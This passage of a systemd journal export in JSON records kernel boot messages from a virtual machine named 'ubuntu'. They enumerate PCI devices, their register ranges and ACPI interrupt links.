"_UDEV_SYSNAME" : "0000:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "272007", "MESSAGE" : "pci_bus 0000:00: root bus resource [mem 0x100000000-0x17fffffff window]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=f2;b=e2b08827b5804427b422c10c84f1567e;m=559118;t=5bd16dd19107f;x=248c379e0cd43533", "__REALTIME_TIMESTAMP" : "1615280779890815", "__MONOTONIC_TIMESTAMP" : "5607704", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci_bus", "_KERNEL_DEVICE" : "+pci_bus:0000:00", "_UDEV_SYSNAME" : "0000:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "275812", "MESSAGE" : "pci_bus 0000:00: root bus resource [bus 00-ff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=f3;b=e2b08827b5804427b422c10c84f1567e;m=5591da;t=5bd16dd191141;x=ecd27e88c67f76bf", "__REALTIME_TIMESTAMP" : "1615280779891009", "__MONOTONIC_TIMESTAMP" : "5607898", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:00.0", "_UDEV_SYSNAME" : "0000:00:00.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "276064", "MESSAGE" : "pci 0000:00:00.0: [8086:1237] type 00 class 0x060000" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=f4;b=e2b08827b5804427b422c10c84f1567e;m=55d23a;t=5bd16dd1951a2;x=9ccf81605d5f9c41", "__REALTIME_TIMESTAMP" : "1615280779907490", "__MONOTONIC_TIMESTAMP" : "5624378", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.0", "_UDEV_SYSNAME" : 
"0000:00:01.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "276813", "MESSAGE" : "pci 0000:00:01.0: [8086:7000] type 00 class 0x060100" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=f5;b=e2b08827b5804427b422c10c84f1567e;m=55d2d6;t=5bd16dd19523d;x=60d223400918274a", "__REALTIME_TIMESTAMP" : "1615280779907645", "__MONOTONIC_TIMESTAMP" : "5624534", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.1", "_UDEV_SYSNAME" : "0000:00:01.1", "_SOURCE_MONOTONIC_TIMESTAMP" : "277719", "MESSAGE" : "pci 0000:00:01.1: [8086:7010] type 00 class 0x010180" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=f6;b=e2b08827b5804427b422c10c84f1567e;m=55d372;t=5bd16dd1952d9;x=dd7e66bae818543a", "__REALTIME_TIMESTAMP" : "1615280779907801", "__MONOTONIC_TIMESTAMP" : "5624690", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.1", "_UDEV_SYSNAME" : "0000:00:01.1", "_SOURCE_MONOTONIC_TIMESTAMP" : "280911", "MESSAGE" : "pci 0000:00:01.1: reg 0x20: [io 0xc0c0-0xc0cf]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=f7;b=e2b08827b5804427b422c10c84f1567e;m=55d435;t=5bd16dd19539d;x=f8e2ac9466ff5f98", "__REALTIME_TIMESTAMP" : "1615280779907997", "__MONOTONIC_TIMESTAMP" : "5624885", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.1", "_UDEV_SYSNAME" : "0000:00:01.1", 
"_SOURCE_MONOTONIC_TIMESTAMP" : "282217", "MESSAGE" : "pci 0000:00:01.1: legacy IDE quirk: reg 0x10: [io 0x01f0-0x01f7]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=f8;b=e2b08827b5804427b422c10c84f1567e;m=55d4e3;t=5bd16dd19544a;x=a17099c37dea2ab9", "__REALTIME_TIMESTAMP" : "1615280779908170", "__MONOTONIC_TIMESTAMP" : "5625059", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.1", "_UDEV_SYSNAME" : "0000:00:01.1", "_SOURCE_MONOTONIC_TIMESTAMP" : "284007", "MESSAGE" : "pci 0000:00:01.1: legacy IDE quirk: reg 0x14: [io 0x03f6]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=f9;b=e2b08827b5804427b422c10c84f1567e;m=55d569;t=5bd16dd1954d0;x=3778f35692f3b203", "__REALTIME_TIMESTAMP" : "1615280779908304", "__MONOTONIC_TIMESTAMP" : "5625193", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.1", "_UDEV_SYSNAME" : "0000:00:01.1", "_SOURCE_MONOTONIC_TIMESTAMP" : "287935", "MESSAGE" : "pci 0000:00:01.1: legacy IDE quirk: reg 0x18: [io 0x0170-0x0177]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=fa;b=e2b08827b5804427b422c10c84f1567e;m=55d5fe;t=5bd16dd195566;x=7a2bf3739926c36d", "__REALTIME_TIMESTAMP" : "1615280779908454", "__MONOTONIC_TIMESTAMP" : "5625342", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.1", "_UDEV_SYSNAME" : 
"0000:00:01.1", "_SOURCE_MONOTONIC_TIMESTAMP" : "288006", "MESSAGE" : "pci 0000:00:01.1: legacy IDE quirk: reg 0x1c: [io 0x0376]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=fb;b=e2b08827b5804427b422c10c84f1567e;m=55d683;t=5bd16dd1955ea;x=3ea7c3e0f893caac", "__REALTIME_TIMESTAMP" : "1615280779908586", "__MONOTONIC_TIMESTAMP" : "5625475", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.2", "_UDEV_SYSNAME" : "0000:00:01.2", "_SOURCE_MONOTONIC_TIMESTAMP" : "291842", "MESSAGE" : "pci 0000:00:01.2: [8086:7020] type 00 class 0x0c0300" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=fc;b=e2b08827b5804427b422c10c84f1567e;m=55d6fc;t=5bd16dd195664;x=cc7b8675d98e90b5", "__REALTIME_TIMESTAMP" : "1615280779908708", "__MONOTONIC_TIMESTAMP" : "5625596", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.2", "_UDEV_SYSNAME" : "0000:00:01.2", "_SOURCE_MONOTONIC_TIMESTAMP" : "294288", "MESSAGE" : "pci 0000:00:01.2: reg 0x20: [io 0xc080-0xc09f]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=fd;b=e2b08827b5804427b422c10c84f1567e;m=55d775;t=5bd16dd1956dd;x=bb7c0f76dca68866", "__REALTIME_TIMESTAMP" : "1615280779908829", "__MONOTONIC_TIMESTAMP" : "5625717", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.3", "_UDEV_SYSNAME" : "0000:00:01.3", 
"_SOURCE_MONOTONIC_TIMESTAMP" : "295835", "MESSAGE" : "pci 0000:00:01.3: [8086:7113] type 00 class 0x068000" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=fe;b=e2b08827b5804427b422c10c84f1567e;m=55d831;t=5bd16dd195799;x=4a4b68dabe7c021a", "__REALTIME_TIMESTAMP" : "1615280779909017", "__MONOTONIC_TIMESTAMP" : "5625905", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.3", "_UDEV_SYSNAME" : "0000:00:01.3", "_SOURCE_MONOTONIC_TIMESTAMP" : "296549", "MESSAGE" : "pci 0000:00:01.3: quirk: [io 0x0600-0x063f] claimed by PIIX4 ACPI" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=ff;b=e2b08827b5804427b422c10c84f1567e;m=55d8b5;t=5bd16dd19581d;x=4f9eb59d248eeca9", "__REALTIME_TIMESTAMP" : "1615280779909149", "__MONOTONIC_TIMESTAMP" : "5626037", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.3", "_UDEV_SYSNAME" : "0000:00:01.3", "_SOURCE_MONOTONIC_TIMESTAMP" : "300020", "MESSAGE" : "pci 0000:00:01.3: quirk: [io 0x0700-0x070f] claimed by PIIX4 SMB" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=100;b=e2b08827b5804427b422c10c84f1567e;m=55f34b;t=5bd16dd1972b2;x=9672743b62d46b09", "__REALTIME_TIMESTAMP" : "1615280779915954", "__MONOTONIC_TIMESTAMP" : "5632843", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:02.0", "_UDEV_SYSNAME" : "0000:00:02.0", 
"_SOURCE_MONOTONIC_TIMESTAMP" : "304343", "MESSAGE" : "pci 0000:00:02.0: [1013:00b8] type 00 class 0x030000" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=101;b=e2b08827b5804427b422c10c84f1567e;m=55f3d4;t=5bd16dd19733b;x=dad091db668fefa1", "__REALTIME_TIMESTAMP" : "1615280779916091", "__MONOTONIC_TIMESTAMP" : "5632980", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:02.0", "_UDEV_SYSNAME" : "0000:00:02.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "306361", "MESSAGE" : "pci 0000:00:02.0: reg 0x10: [mem 0xfc000000-0xfdffffff pref]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=102;b=e2b08827b5804427b422c10c84f1567e;m=55f460;t=5bd16dd1973c7;x=b848ec1593b0e0b2", "__REALTIME_TIMESTAMP" : "1615280779916231", "__MONOTONIC_TIMESTAMP" : "5633120", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:02.0", "_UDEV_SYSNAME" : "0000:00:02.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "307479", "MESSAGE" : "pci 0000:00:02.0: reg 0x14: [mem 0xfeb90000-0xfeb90fff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=103;b=e2b08827b5804427b422c10c84f1567e;m=55f4d9;t=5bd16dd197440;x=cd2a284651410bdd", "__REALTIME_TIMESTAMP" : "1615280779916352", "__MONOTONIC_TIMESTAMP" : "5633241", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:02.0", "_UDEV_SYSNAME" : "0000:00:02.0", 
"_SOURCE_MONOTONIC_TIMESTAMP" : "315528", "MESSAGE" : "pci 0000:00:02.0: reg 0x30: [mem 0xfeb80000-0xfeb8ffff pref]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=104;b=e2b08827b5804427b422c10c84f1567e;m=55ff5b;t=5bd16dd197ec3;x=d559f12bdc4d3a18", "__REALTIME_TIMESTAMP" : "1615280779919043", "__MONOTONIC_TIMESTAMP" : "5635931", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:03.0", "_UDEV_SYSNAME" : "0000:00:03.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "316278", "MESSAGE" : "pci 0000:00:03.0: [1af4:1000] type 00 class 0x020000" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=105;b=e2b08827b5804427b422c10c84f1567e;m=560065;t=5bd16dd197fcd;x=c1318bc350a41dce", "__REALTIME_TIMESTAMP" : "1615280779919309", "__MONOTONIC_TIMESTAMP" : "5636197", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:03.0", "_UDEV_SYSNAME" : "0000:00:03.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "318019", "MESSAGE" : "pci 0000:00:03.0: reg 0x10: [io 0xc000-0xc03f]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=106;b=e2b08827b5804427b422c10c84f1567e;m=560c8d;t=5bd16dd198bf5;x=3790925f3d37d293", "__REALTIME_TIMESTAMP" : "1615280779922421", "__MONOTONIC_TIMESTAMP" : "5639309", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:03.0", "_UDEV_SYSNAME" : "0000:00:03.0", 
"_SOURCE_MONOTONIC_TIMESTAMP" : "319363", "MESSAGE" : "pci 0000:00:03.0: reg 0x14: [mem 0xfeb91000-0xfeb91fff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=107;b=e2b08827b5804427b422c10c84f1567e;m=561022;t=5bd16dd198f8a;x=9a96e7085dc5526d", "__REALTIME_TIMESTAMP" : "1615280779923338", "__MONOTONIC_TIMESTAMP" : "5640226", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:03.0", "_UDEV_SYSNAME" : "0000:00:03.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "324685", "MESSAGE" : "pci 0000:00:03.0: reg 0x20: [mem 0xfe000000-0xfe003fff 64bit pref]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=108;b=e2b08827b5804427b422c10c84f1567e;m=5610ab;t=5bd16dd199012;x=258d5893ee7cb072", "__REALTIME_TIMESTAMP" : "1615280779923474", "__MONOTONIC_TIMESTAMP" : "5640363", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:03.0", "_UDEV_SYSNAME" : "0000:00:03.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "325809", "MESSAGE" : "pci 0000:00:03.0: reg 0x30: [mem 0xfeb00000-0xfeb7ffff pref]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=109;b=e2b08827b5804427b422c10c84f1567e;m=56145b;t=5bd16dd1993c3;x=a445db786e25b7ff", "__REALTIME_TIMESTAMP" : "1615280779924419", "__MONOTONIC_TIMESTAMP" : "5641307", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:04.0", "_UDEV_SYSNAME" : 
"0000:00:04.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "326787", "MESSAGE" : "pci 0000:00:04.0: [1af4:1001] type 00 class 0x010000" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=10a;b=e2b08827b5804427b422c10c84f1567e;m=5614e0;t=5bd16dd199447;x=953a051cf3c0a2f0", "__REALTIME_TIMESTAMP" : "1615280779924551", "__MONOTONIC_TIMESTAMP" : "5641440", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:04.0", "_UDEV_SYSNAME" : "0000:00:04.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "328007", "MESSAGE" : "pci 0000:00:04.0: reg 0x10: [io 0xc040-0xc07f]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=10b;b=e2b08827b5804427b422c10c84f1567e;m=56155a;t=5bd16dd1994c1;x=eca6999d82627363", "__REALTIME_TIMESTAMP" : "1615280779924673", "__MONOTONIC_TIMESTAMP" : "5641562", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:04.0", "_UDEV_SYSNAME" : "0000:00:04.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "329720", "MESSAGE" : "pci 0000:00:04.0: reg 0x14: [mem 0xfeb92000-0xfeb92fff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=10c;b=e2b08827b5804427b422c10c84f1567e;m=5615d1;t=5bd16dd199538;x=b23315038c74e053", "__REALTIME_TIMESTAMP" : "1615280779924792", "__MONOTONIC_TIMESTAMP" : "5641681", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:04.0", "_UDEV_SYSNAME" : "0000:00:04.0", 
"_SOURCE_MONOTONIC_TIMESTAMP" : "335597", "MESSAGE" : "pci 0000:00:04.0: reg 0x20: [mem 0xfe004000-0xfe007fff 64bit pref]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=10d;b=e2b08827b5804427b422c10c84f1567e;m=567973;t=5bd16dd19f8da;x=8ff045f9f3e8fc82", "__REALTIME_TIMESTAMP" : "1615280779950298", "__MONOTONIC_TIMESTAMP" : "5667187", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:05.0", "_UDEV_SYSNAME" : "0000:00:05.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "337790", "MESSAGE" : "pci 0000:00:05.0: [1af4:1002] type 00 class 0x00ff00" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=10e;b=e2b08827b5804427b422c10c84f1567e;m=567a66;t=5bd16dd19f9cd;x=7d0a2d1aec5849bc", "__REALTIME_TIMESTAMP" : "1615280779950541", "__MONOTONIC_TIMESTAMP" : "5667430", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:05.0", "_UDEV_SYSNAME" : "0000:00:05.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "338824", "MESSAGE" : "pci 0000:00:05.0: reg 0x10: [io 0xc0a0-0xc0bf]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=10f;b=e2b08827b5804427b422c10c84f1567e;m=567afa;t=5bd16dd19fa62;x=616e0cb21b26318b", "__REALTIME_TIMESTAMP" : "1615280779950690", "__MONOTONIC_TIMESTAMP" : "5667578", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:05.0", "_UDEV_SYSNAME" : "0000:00:05.0", 
"_SOURCE_MONOTONIC_TIMESTAMP" : "341694", "MESSAGE" : "pci 0000:00:05.0: reg 0x20: [mem 0xfe008000-0xfe00bfff 64bit pref]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=110;b=e2b08827b5804427b422c10c84f1567e;m=567b1c;t=5bd16dd19fa83;x=a407ca8354182a3b", "__REALTIME_TIMESTAMP" : "1615280779950723", "__MONOTONIC_TIMESTAMP" : "5667612", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "344087", "MESSAGE" : "ACPI: PCI Interrupt Link [LNKA] (IRQs 5 *10 11)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=111;b=e2b08827b5804427b422c10c84f1567e;m=567b39;t=5bd16dd19faa0;x=5a080d416374655", "__REALTIME_TIMESTAMP" : "1615280779950752", "__MONOTONIC_TIMESTAMP" : "5667641", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "348221", "MESSAGE" : "ACPI: PCI Interrupt Link [LNKB] (IRQs 5 *10 11)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=112;b=e2b08827b5804427b422c10c84f1567e;m=567b56;t=5bd16dd19fabe;x=f56c6933e8a41b64", "__REALTIME_TIMESTAMP" : "1615280779950782", "__MONOTONIC_TIMESTAMP" : "5667670", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "351450", "MESSAGE" : "ACPI: PCI Interrupt Link [LNKC] (IRQs 5 10 *11)" } { "__CURSOR" : 